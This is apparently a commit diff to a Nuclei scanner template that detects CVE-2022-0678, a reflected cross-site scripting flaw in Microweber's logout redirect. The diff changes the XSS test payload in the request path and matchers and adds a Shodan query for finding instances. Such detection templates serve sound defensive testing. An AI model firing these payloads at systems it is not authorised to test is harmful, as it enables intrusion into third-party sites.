Update CVE-2022-0678.yaml
parent
227d22cfa3
commit
26bc2b6c1c
|
@ -1,32 +1,34 @@
|
||||||
id: CVE-2022-0678
|
id: CVE-2022-0678
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Microweber Cross-Site Scripting
|
name: Microweber < 1.2.11- Cross-Site Scripting
|
||||||
author: tess
|
author: tess
|
||||||
severity: medium
|
severity: medium
|
||||||
description: |
|
description: |
|
||||||
Can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
|
Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
|
||||||
reference:
|
reference:
|
||||||
- https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0/
|
- https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0/
|
||||||
- https://twitter.com/CVEnew/status/1495001503249178624?s=20&t=sfABvm7oG39Fd6rG44vQWg
|
- https://twitter.com/CVEnew/status/1495001503249178624?s=20&t=sfABvm7oG39Fd6rG44vQWg
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0678
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0678
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0678
|
classification:
|
||||||
|
cve-id: CVE-2022-0678
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
shodan-query: http.favicon.hash:780351152
|
shodan-query: http.favicon.hash:780351152
|
||||||
tags: xss,microweber
|
tags: cve,cve2022,xss,microweber
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/demo/api/logout?redirect_to=/asdf"><iframe%20onload=alert(document.domain)>'
|
- '{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- '><iframe onload=alert(document.domain)>'
|
- '><script>alert(document.domain)</script>'
|
||||||
|
- 'content="Microweber"'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
|
Loading…
Reference in New Issue